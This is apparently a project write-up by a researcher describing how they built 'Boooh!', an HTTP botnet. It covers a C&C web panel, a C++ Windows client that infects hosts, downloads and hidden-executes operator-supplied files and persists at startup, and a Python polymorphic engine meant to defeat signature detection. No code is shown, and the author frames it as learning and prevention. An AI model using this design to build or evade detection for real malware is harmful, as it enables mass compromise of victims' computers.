"Droid" is a pseudonym of Filipe Borges created with the purpose of doing investigations in the area of digital security.
With Boooh!, I proceeded to develop a simple "HTTP" botnet divided into 3 different sectors:
Command and control panel is intended to manage and command the network of infected computers (Zombies)
It is an executave (.exe Windows) that when executed infects the computer making it a member of the network.
Generates a new version of the Client node, for the purpose of create a new signature for each generated Client.
The reason behind this project came from reading a paper published by Saurabh Borwankar on Polymorphic and
Metamorphic Virus where the concept of polymorphic / Metamorphic code is approached and exemplified based
on the javaScript programming language.
In a very basic way polymorphic code is code that uses a polymorphic engine to mutate while keeping the
original algorithm intact, and Metamorphic code is code that when run outputs to logically equivalent
version of its own code under some interpretation.
I found this interesting suggestion and did a research to find something that premised me to use this advice,
and at the same time encompassed the c ++ programming language in order to increase my ablities. As a result
I came to the conclusion that developing a Loader (botnet) for the Windows operating system might be what I needed.
Developing the panel first was a good way to start up the project and I already had good skills in developing Web Apps which would make it a quick way to get started. So the Panel would be the first to be developed.
Secondly, I define the development of main .exe (client) code in c ++.
For last would be the creation of polymorphic engine, using the code built in the second stage as reference. I decided to use the python language to develop this engine.
First I started by developing a login system with 2 levels of access, Admin and sub-admins.
Admin has access to see the whole zombie network, and the sub-admins only zombies connected with their credentials.
This done I started by define all the pages i need for a functional botnet panel, and concluded 5 pages. I start with developing the front end(Html,css,js) than Back end(php) using the laravel as fremwork:
DashBorad - Where all information is organized in an organized manner;
Bots - A datatable with all the zombie information pertaining to each panel;
Commands - Page where you can see / send commands with .exe file links for the zombies to obey;
Connections - Where it is possible to see real-time connections from zombies to the panel;
Accounts - A page intended only for the administrator where it is possible to manage the sub admin panel accounts;
Done! Than I needed make a simple API to allow connections between client (c ++) and panel server (php) to compleat
the panel side of the botnet. I did it in a very simple way using http get request, and, to ensure the connection, I develope an encryption / decryption
model based on XOR artgorithm with an 8-digit key generated by the panel for ech user and Base64. (I know that the XOR argorithm is not the best, but for the purpose is more than enough)
Okay, now it's time to develop the main C++ client code. For this case I started do some reserach on the functionalitites that I needed for the Node, and concluded on:
Http Get Request - This function is short explained a Client-Side connection to the Server-Side API.
Encryption/Decryption - An model that matches the Server-Side to allow information being encrypted between the client and the server.
Download Function - This allows the node to download files based on a attached URL given by the C&C administrator.
Hidden Executable Program - This allows the node to demand the execuatable program to execute the recent downloaded file.
Startup Function - This node are always choosen to autostart at the bootup session for your infected systems.
This done! was time to start developing to concluder the secound stage.
For the last session I needed to focus on developing a Python programming
engine that used the C++ code created on the secound stage as referece, and rewrote
it on a mutate way without functionality lost.
I did essentiality organize the pre-developed C++ source in an organized array and replace the stuff i want randomize by predefined macros.
This made it possible for me to establish an class that was able to interpret the macros on the code, replace them by new generated
elements(var names, dead functions...) and save the result on them relative c++ Virtual Studio Project file.
Developing this project was unbelievably funny and intelectual rewarding! With it
I had the opportunity to understand a little more about digital security, more
specifically about botnets, how they work, how they are built, and most importantly, how to better prevent them.Also not forget the enrichment
of my ablities in php, java-script, html, css, and especially c ++ and python which are
languages that I still have relatively little experience with.
So to conclude, all the code mentioned in this presentation will be openly available in github use it responsibly.
Thank you for the time!
DROID!